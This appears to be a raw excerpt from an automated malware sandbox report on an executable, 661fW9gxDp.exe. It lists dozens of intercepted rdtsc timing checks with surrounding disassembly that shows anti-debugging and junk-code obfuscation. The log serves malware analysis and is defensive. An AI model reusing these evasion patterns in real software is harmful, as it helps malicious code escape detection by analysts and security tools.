              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB4E20 second address: FB4E2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB4E2D second address: FB4E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB4E32 second address: FB4E39 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB4E39 second address: FB4E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 jmp 00007F646CD1477Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB80FC second address: FB8115 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F646C53F7ABh 0x0000000b jnp 00007F646C53F7ACh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F75A7C second address: F75A91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F646CD1477Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB9DBC second address: FB9DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jmp 00007F646C53F7ACh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FBAE41 second address: FBAE45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FBAE45 second address: FBAE4B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FBAE4B second address: FBAE51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FBAE51 second address: FBAE55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FBBDAB second address: FBBDB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FBBDB1 second address: FBBDB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FBBDB5 second address: FBBDDD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 sub dword ptr [ebp+122D319Eh], edi 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+122D207Ch], edx 0x00000017 push 00000000h 0x00000019 sbb ebx, 0AF0F0ADh 0x0000001f mov bl, ch 0x00000021 xchg eax, esi 0x00000022 push eax 0x00000023 push edx 0x00000024 push esi 0x00000025 pushad 0x00000026 popad 0x00000027 pop esi 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FBBDDD second address: FBBDEA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FBBF30 second address: FBBF3D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FBE2BE second address: FBE35C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c call 00007F646C53F7AEh 0x00000011 xor dword ptr [ebp+122D2796h], edi 0x00000017 pop edi 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007F646C53F7A8h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 jnc 00007F646C53F7ACh 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ecx 0x0000003f call 00007F646C53F7A8h 0x00000044 pop ecx 0x00000045 mov dword ptr [esp+04h], ecx 0x00000049 add dword ptr [esp+04h], 00000014h 0x00000051 inc ecx 0x00000052 push ecx 0x00000053 ret 0x00000054 pop ecx 0x00000055 ret 0x00000056 xor dword ptr [ebp+1245AA4Ah], edx 0x0000005c jmp 00007F646C53F7B9h 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FBBF3D second address: FBBF41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FBE35C second address: FBE370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F646C53F7AFh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FBF2A8 second address: FBF31C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F646CD14783h 0x0000000c pop ecx 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 add edi, dword ptr [ebp+122D3646h] 0x00000017 jmp 00007F646CD14787h 0x0000001c push 00000000h 0x0000001e mov edi, 03BD092Dh 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push edi 0x00000028 call 00007F646CD14778h 0x0000002d pop edi 0x0000002e mov dword ptr [esp+04h], edi 0x00000032 add dword ptr [esp+04h], 00000016h 0x0000003a inc edi 0x0000003b push edi 0x0000003c ret 0x0000003d pop edi 0x0000003e ret 0x0000003f mov edi, dword ptr [ebp+122D3C10h] 0x00000045 mov dword ptr [ebp+122D3121h], edi 0x0000004b push eax 0x0000004c push ebx 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC02C0 second address: FC02DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC11E8 second address: FC1238 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD14782h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c sub edi, dword ptr [ebp+122D3B78h] 0x00000012 mov edi, dword ptr [ebp+122D3C18h] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007F646CD14778h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 00000014h 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 xchg eax, esi 0x00000037 js 00007F646CD14784h 0x0000003d push eax 0x0000003e push edx 0x0000003f push ecx 0x00000040 pop ecx 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC1238 second address: FC123C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC058B second address: FC058F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC2284 second address: FC2288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC2288 second address: FC228E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC13FD second address: FC1425 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F646C53F7ACh 0x0000000c je 00007F646C53F7A6h 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F646C53F7B2h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC1425 second address: FC142F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F646CD14776h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC142F second address: FC14CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F646C53F7A8h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 jmp 00007F646C53F7AEh 0x00000028 push dword ptr fs:[00000000h] 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007F646C53F7A8h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 00000016h 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 mov dword ptr fs:[00000000h], esp 0x00000050 mov edi, dword ptr [ebp+122D3058h] 0x00000056 mov eax, dword ptr [ebp+122D0EE1h] 0x0000005c push FFFFFFFFh 0x0000005e mov edi, dword ptr [ebp+12449D8Ah] 0x00000064 nop 0x00000065 pushad 0x00000066 jnl 00007F646C53F7ACh 0x0000006c jc 00007F646C53F7A8h 0x00000072 push esi 0x00000073 pop esi 0x00000074 popad 0x00000075 push eax 0x00000076 pushad 0x00000077 push eax 0x00000078 push edx 0x00000079 jne 00007F646C53F7A6h 0x0000007f rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC33A9 second address: FC33D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD14780h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F646CD14780h 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC4379 second address: FC437F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC63AB second address: FC63AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC63AF second address: FC63B9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F646C53F7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC63B9 second address: FC643C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F646CD1477Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b js 00007F646CD1477Ah 0x00000011 push ecx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop ecx 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F646CD14778h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 sub dword ptr [ebp+1245AA4Fh], esi 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007F646CD14778h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 00000015h 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 or dword ptr [ebp+122D33DAh], ebx 0x00000058 push 00000000h 0x0000005a sub bx, 6154h 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007F646CD14780h 0x00000067 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC54FF second address: FC5503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC5503 second address: FC5507 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC5507 second address: FC55AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jmp 00007F646C53F7B0h 0x0000000d nop 0x0000000e mov dword ptr [ebp+122D393Eh], edi 0x00000014 push dword ptr fs:[00000000h] 0x0000001b jmp 00007F646C53F7B9h 0x00000020 pushad 0x00000021 movzx edx, si 0x00000024 add edi, dword ptr [ebp+122D3997h] 0x0000002a popad 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 cld 0x00000033 mov eax, dword ptr [ebp+122D0515h] 0x00000039 push 00000000h 0x0000003b push edx 0x0000003c call 00007F646C53F7A8h 0x00000041 pop edx 0x00000042 mov dword ptr [esp+04h], edx 0x00000046 add dword ptr [esp+04h], 0000001Bh 0x0000004e inc edx 0x0000004f push edx 0x00000050 ret 0x00000051 pop edx 0x00000052 ret 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push ebx 0x00000058 call 00007F646C53F7A8h 0x0000005d pop ebx 0x0000005e mov dword ptr [esp+04h], ebx 0x00000062 add dword ptr [esp+04h], 00000015h 0x0000006a inc ebx 0x0000006b push ebx 0x0000006c ret 0x0000006d pop ebx 0x0000006e ret 0x0000006f mov di, dx 0x00000072 push eax 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC55AA second address: FC55AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC35A7 second address: FC35AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC752E second address: FC7534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC657A second address: FC657E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC35AD second address: FC35BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC657E second address: FC6600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, dword ptr [ebp+122D33C3h] 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov bx, DF51h 0x0000001b mov bx, 6AFAh 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 push 00000000h 0x00000028 push edi 0x00000029 call 00007F646C53F7A8h 0x0000002e pop edi 0x0000002f mov dword ptr [esp+04h], edi 0x00000033 add dword ptr [esp+04h], 00000016h 0x0000003b inc edi 0x0000003c push edi 0x0000003d ret 0x0000003e pop edi 0x0000003f ret 0x00000040 mov bh, dl 0x00000042 mov eax, dword ptr [ebp+122D0669h] 0x00000048 mov dword ptr [ebp+122D3772h], ecx 0x0000004e push FFFFFFFFh 0x00000050 push 00000000h 0x00000052 push edi 0x00000053 call 00007F646C53F7A8h 0x00000058 pop edi 0x00000059 mov dword ptr [esp+04h], edi 0x0000005d add dword ptr [esp+04h], 00000017h 0x00000065 inc edi 0x00000066 push edi 0x00000067 ret 0x00000068 pop edi 0x00000069 ret 0x0000006a or di, 2EF5h 0x0000006f push eax 0x00000070 pushad 0x00000071 push eax 0x00000072 push edx 0x00000073 jnl 00007F646C53F7A6h 0x00000079 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC35BC second address: FC35C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC35C0 second address: FC35CA instructions: 0x00000000 rdtsc 0x00000002 jg 00007F646C53F7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC35CA second address: FC35D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC35D0 second address: FC35D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC35D4 second address: FC366B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+122D202Ch], ecx 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F646CD14778h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 mov ebx, dword ptr [ebp+122D3A94h] 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d cld 0x0000003e mov eax, dword ptr [ebp+122D1409h] 0x00000044 mov dword ptr [ebp+122D3892h], edx 0x0000004a push FFFFFFFFh 0x0000004c push 00000000h 0x0000004e push edi 0x0000004f call 00007F646CD14778h 0x00000054 pop edi 0x00000055 mov dword ptr [esp+04h], edi 0x00000059 add dword ptr [esp+04h], 0000001Bh 0x00000061 inc edi 0x00000062 push edi 0x00000063 ret 0x00000064 pop edi 0x00000065 ret 0x00000066 mov edi, dword ptr [ebp+122D33FAh] 0x0000006c nop 0x0000006d push eax 0x0000006e push edx 0x0000006f jnp 00007F646CD1478Ch 0x00000075 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC366B second address: FC3687 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F646C53F7B8h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC3687 second address: FC3699 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 js 00007F646CD1477Eh 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC94FC second address: FC9500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC960A second address: FC9623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F646CD14784h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC9623 second address: FC962D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F646C53F7A6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC96EA second address: FC9704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F646CD14776h 0x0000000a popad 0x0000000b push eax 0x0000000c je 00007F646CD14784h 0x00000012 push eax 0x00000013 push edx 0x00000014 ja 00007F646CD14776h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FCA4F3 second address: FCA575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 adc bl, FFFFFFA0h 0x0000000c push dword ptr fs:[00000000h] 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F646C53F7A8h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d movsx edi, cx 0x00000030 mov ebx, dword ptr [ebp+122D3772h] 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d mov eax, dword ptr [ebp+122D033Dh] 0x00000043 push 00000000h 0x00000045 push edx 0x00000046 call 00007F646C53F7A8h 0x0000004b pop edx 0x0000004c mov dword ptr [esp+04h], edx 0x00000050 add dword ptr [esp+04h], 0000001Ch 0x00000058 inc edx 0x00000059 push edx 0x0000005a ret 0x0000005b pop edx 0x0000005c ret 0x0000005d push ecx 0x0000005e pop ebx 0x0000005f push FFFFFFFFh 0x00000061 mov ebx, dword ptr [ebp+122D38AFh] 0x00000067 nop 0x00000068 pushad 0x00000069 push eax 0x0000006a push edx 0x0000006b push edi 0x0000006c pop edi 0x0000006d rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FCA575 second address: FCA583 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F646CD14776h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FD20AC second address: FD20B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FD2212 second address: FD2241 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F646CD14776h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007F646CD14776h 0x00000016 jmp 00007F646CD14789h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FD23C1 second address: FD23C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FD23C7 second address: FD23F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F646CD14789h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f push ebx 0x00000010 ja 00007F646CD14776h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FD70A8 second address: FD70AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FD70AE second address: FD70F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD14782h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007F646CD1477Fh 0x00000017 jmp 00007F646CD14784h 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FD70F1 second address: FD70FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F646C53F7AAh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FD7326 second address: FD7338 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD1477Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FD7338 second address: FD734E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F646C53F7A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 rdtsc
